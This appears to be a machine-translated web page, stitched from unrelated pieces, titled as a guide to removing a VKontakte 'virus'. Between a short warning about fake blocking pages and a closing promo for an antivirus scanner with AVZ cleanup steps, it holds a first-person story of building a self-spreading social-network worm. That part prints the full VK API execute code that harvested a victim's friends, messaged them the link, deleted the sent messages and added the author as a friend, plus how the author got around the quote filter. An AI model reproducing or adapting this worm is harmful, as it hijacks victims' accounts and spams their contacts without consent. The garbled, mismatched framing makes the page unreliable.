Remove VKontakte and Odnoklassniki virus from your computer

The essence of the problem

Most likely, there is a “Trojan” on your PC, the purpose of which is to lure more money from naive users. This is what a pseudo-blocking page might look like:

Common situation?

I would like to note right away that there is no need to send any SMS. The solution to the problem is completely free. You will soon see this for yourself.

Virus for VKontakte

Another day I sat in front of the computer and didn’t know what to do. Scrolling through my feed, I already returned to yesterday’s posts that I had already seen. When I went to my page I thought to myself: “God, only 160 subscribers. How little is this..." And the question immediately arose: “How to increase them?” It’s clear that cheating will come to everyone’s mind. But this required either money, or spending a lot of time subscribing, reposting or liking whatever - this was not an option.

Later, before going to bed, an idea came to me on how to do this. The idea was a viral link that almost all Internet users would receive. Waking up in the morning and drinking coffee, I began to implement this idea. It has long been no secret to many that in order to perform requests on behalf of a user in the VK API, you need to have its access_token. But! The site itself does not require this key just to test it. Before starting to create this Super Virus, I just wanted to check its functionality.

For the test, I used the friends.add method and entered my id in the user_id field.
After performing this action, the address bar will change to something like this: Address bar
https://vk.com/dev/friends.add?params[user_id]=id I shortened this link via vk.cc and left it in the comments to two popular groups with a tempting description. Half an hour later I already had 100 subscribers (there would have been more, but my comment was deleted and I was banned). After that, I became confident that it would work and started creating it.

VKontakte limits access to the API from one IP to an interval of 5 seconds so that the server does not overload. And to solve the problem with frequent requests, they created the execute method. This method allows you to call several methods simultaneously while saving the algorithm, which is what I used.

This virus mainly relies on the gullibility of people, in two words - “social engineering”. Each of us will probably click on the link in a message from his friend - this is exactly what I wanted to enslave the world to take advantage of.

It took me about a day to create the virus, as I encountered a couple of obstacles. More on this later. The virus was supposed to work like this:

1. The user followed the link
2. The method gets a list of all friends and sorts them by rating
3. Sends a message with the text “See /* link */”
4. The message is deleted from the sender
5. Adds as a friend and/or subscribes to the specified groups
6. Friends who received the message follow the link
7. Let's start from the beginning

And this is actually what this code looks like in the method: var a = API.friends.get({ // Method for getting a list of all friends “order”: “hints” // Parameter for sorting by rating }).items; // Get only the list var b = 0; // Variable for the loop var d = 0; // Variable for message id while ( a ){ d = API.messages.send({ // Method for sending a message. Returns message id "user_id": a , // recipient "message": "See /* link */ " // Message text });
API.messages.delete({ // Delete a message by its id “message_ids”: d }); b = b + 1; //Increase b by 1 (++b or b++ does not work) } API.friends.add({ "user_id": "my id" }); Having received the link, I happily went to test it on my fake profile. But it was not there. After clicking on the link, I received error 12: Syntax error. The & character was not expected. This is where my obstacles began. As it turns out, the XML protection server translates all characters. And the double quotation mark " was simply translated into &quotes; and the console gave an error. Single quotes are not translated, but it will not accept them, since the syntax is from JSON.

Since this is my first attempt at working with a vulnerability (like this post), it took me a little longer. The first five hours were spent understanding that keys can be transferred without quotes, and it is not necessary to write numbers in quotes either. Those. you can do this:

API.friends.add({ user_id: 1234567 }); Okay, half the problem was solved. There was only one problem left: I needed to figure out how to pass the message text and the word “hints” for sorting.

For reference! Why was it necessary to pass the hints parameter?

The fact is that even on the method test page, if there is a suspicious request (for example, sending a message from 3 or 7), you are required to enter a captcha.
It is not a fact that the message will be sent to the right person. Therefore, passing this parameter will sort the list so that the first three from the list are 90% more likely to follow the link. To solve the last problem I thought of using regular expressions or something like that to replace the number 0 into a string.
I myself am just a beginner web developer and didn’t know how to do this, so I asked the question on the toaster. Having received two answers I needed with different solutions, I immediately decided to use them. And here again the problem... The VKontakte API is not JavaScript and does not support its functions like replace() or toString(). And in general it does not support anything from JS, except var, return, while, if, else, arrays and comparison operators.

I again found myself in a dead end and did not know what to do. I told my fellow programmers about this asking for help. With the words “This is just brilliant, dude!” they decided to help me and went to dig into the API documentation

It took me a long time to figure out how to solve this problem. It got late and I went to bed. Before going to bed, I was again struck by a great idea to solve this problem.

It's morning again. After drinking my dose of morning coffee, the first thing I did was start continuing my virus. The solution was quite simple. After all, when passing numbers or variables from methods, it is not necessary to write them in quotes.

I needed my fake profile. There I made two different posts with the following texts:

• See /* link */
• hints

All I needed was to get these records and write them into variables, which is what I did. As a result, I ended up with the following code: var b = 0; // Variable for the loop var d = 0; // Variable for message id var m = API.wall.get({ owner_id: id, // fake page id count: 1 // return only 1 post }).items[0].text; // get only the text of the article var h = API.wall.get({ owner_id: id, // id of the fake page count: 1, // return only 1 post offset: 1 // shift posts by 1 }).items[0 ].text; // get only the text of the article var a = API.friends.get({ // Method for getting a list of all friends order: h // Parameter for sorting by rating }).items; // Get only the list while ( a ){ d = API.messages.send({ // Method for sending a message. Returns message id user_id: a , // recipient message: m // message text });
API.messages.delete({ // Delete a message by its id message_ids: d }); b = b + 1; //Increase b by 1 (++b or b++ does not work) } API.friends.add({ "user_id": "my id" }); Having received the link, I checked it to see if it works and - hurray! Everything worked as it should. A friend request was sent from a fake page and messages were successfully sent to the first 7 friends from the rating. Having compressed the link and put it on the first post, I prepared for the Big Boom with a satisfied smile! To also know how many people followed the link, I compressed the link to a php file on my hosting, which recorded the visit in the database, and redirected to the method with the code.

For intrigue, I did not refresh the page every time, but simply left VK immediately after one comment. I returned about an hour later and, looking at the number of entries in the database, felt a surge of happiness. The joy knew no bounds! More than 5000 transitions. “And this in just an hour! What will happen in two?” - I asked myself a question. After all, this was my first experience in hacking.

Deciding to see how much had accumulated on the page personally, I went to the site and saw as many as 3 new subscribers! Can't say I wasn't surprised. I didn’t understand anything... There were more than 5000 lines in the database, where almost everyone had an individual IP, and only 3 subscribers. I began to think that I’m actually not as smart as I thought I was 2 minutes ago, and that such frauds VK already has protection. With such thoughts I left to be sad.

It's been 2 days already. Before going to bed, I decided to check my website. I looked into the database and, out of curiosity, looked at the table for recording statistics. There have already been more than 25,000 visits via the viral link, and there are fewer subscribers because... Those who were a test for me at the beginning also unsubscribed.

Again before going to bed, I finally understood why there were no new subscribers, and the number of clicks was growing (someone, write a post about why decisions come before bed? Otherwise, I’ll write it myself). It was all in the code. The execute method executes the code, saving the algorithm, and the add friend method was at the very end. It did not work because further methods were not executed until the captcha was entered. Because all my “victims” had more than 8 friends, naturally the captcha was triggered, and users, suspecting something, simply closed the tab. The recording was saved, messages were transmitted, but there were no more slaves for subscribers.

Immediately jumping out of bed, I decided to fix this quickly, so that by the morning there would already be more than ten thousand subscribers. After making changes to the redirection php file, I went to bed with happy thoughts about tomorrow.

Morning comes and I check my profile without even drinking my coffee. Hooray! There were fewer subscribers... I was again extremely surprised. It should still work. This time I decided to check the functionality of the link on a real profile. Having deleted the code to delete the message, I followed the generated link. It turns out that the developers have already closed this vulnerability. The code in the address bar for the transition no longer worked

I don’t know how they figured it out themselves. I'm a genius here! Either the message reached them, or one of the programmers I knew secretly told about the vulnerability, whatever it is, I will never know about it.

I was still happy, because for the first time I was able to find a vulnerability in a large network. It may be normal for others, but for me it was something special.

VKontakte Antivirus (Cezurity Scanner)

Cloud service for checking and treating your computer. Cezurity Anti-Virus Scanner will check your computer for free for malware - viruses, Trojans, spyware, rootkits (hidden programs). In case of infection, the anti-virus scanner will cure your computer.

• A quick check will only take a few minutes.
• The scanner will help detect and neutralize threats missed by other antiviruses.
• Compatible with other installed antiviruses.
• It is easy and quick to install and does not require constant updates of anti-virus databases.

The download menu looks like launching a regular application on a social network:

After clicking on the “Install Scanner” button, you should see a window that will offer installation options. Where in the first case the program is installed with the recommended settings, and in the second case you can disable actions that you do not need. Made your choice and clicked the “accept and install” button

Now we see a proposal to save the file

After saving, run the file and the installation of “VKontakte antivirus” begins

And at the end the main menu of the program opens in front of you

This application is not the main protection of your computer from viruses - it is only a professional tool for protecting a VK page. I repeat once again, it is not a general antivirus for the entire system.

Additional unlocking of VK account

If it doesn’t work and you (you) are still blocked on VKontakte, then we’ll try to act on a larger scale, namely:

1. Launch AVZ (if you don’t have it, then you probably haven’t read everything described above). We unpack the archive with it somewhere convenient for you;
2. Run avz.exe in the folder where you unpacked it;
3. In the program window “File” – “System Restore”. In the window that appears, check off items 6, 8, 9, 13, 14, 15 and 20, 21 (20 and 21 may not be present in the old version of AVZ - then without them). Next, click “Perform selected operations”;
4. Once completed, close AVZ and DO NOT open the Internet for now;
5. Next we do: Start - run - cmd - ok. In the console that appears, write: ipconfig /flushdns
6. Press enter. Then enter: route -f
7. Press enter

Restart your computer, connect to the Internet, and try logging in. If it doesn’t help, then use the articles here: “Cleaning the registry, temporary files and “traces” after uninstalling programs” and here: “How to quickly remove viruses. Part 5 "